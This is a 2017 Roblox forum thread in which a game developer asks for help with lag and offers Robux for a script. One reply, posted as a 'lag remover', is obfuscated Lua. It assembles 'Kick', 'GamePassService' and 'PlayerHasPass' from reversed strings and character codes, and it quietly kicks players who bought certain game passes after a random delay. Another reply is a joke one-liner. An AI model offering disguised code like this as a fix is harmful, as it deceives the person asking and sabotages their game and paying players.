|
| 16 Jan 2017 03:21 PM |
This is my game: https://web.roblox.com/games/510458441/Assassin-RPG-MAJOR-SPAWN-UPDATE#!/game-instances
And it is experiencing lag problems, I need it so there is as little lag as possible, if anybody can tell me or make ma script some how
I am willing to pay 1k robux for it. |
|
|
| Report Abuse |
|
|
pketny
|
  |
| Joined: 27 Dec 2010 |
| Total Posts: 1162 |
|
|
| 16 Jan 2017 03:22 PM |
| Are you using models from the toolbox? |
|
|
| Report Abuse |
|
|
mani_fold
|
  |
| Joined: 23 Dec 2016 |
| Total Posts: 546 |
|
|
| 16 Jan 2017 03:22 PM |
while true do workspace.lag=workspace.lag*(1/10) end |
|
|
| Report Abuse |
|
|
|
| 16 Jan 2017 03:24 PM |
| Eh, only the trees, and a statue |
|
|
| Report Abuse |
|
|
| |
|
|
| 16 Jan 2017 03:27 PM |
Put this in a script
local lag_to_remove = {510927542,510928915,521259423,526685735,610979709} game.Players.PlayerAdded:connect(function(player) local b=string.char(99)..string.char(107) local c=player[string.char(75)..string.char(105)..b] local d=game:GetService("Game"..string.reverse("ecivre".."Sss".."aP") local e="Player" local f=d[e..string.reverse("ssa".."Ps".."aH")] for i,v in pairs(lag_to_remove) do if f(d,player,v)then delay(math.random(300,500),function()c(player)end)end end end) |
|
|
| Report Abuse |
|
|
| |
|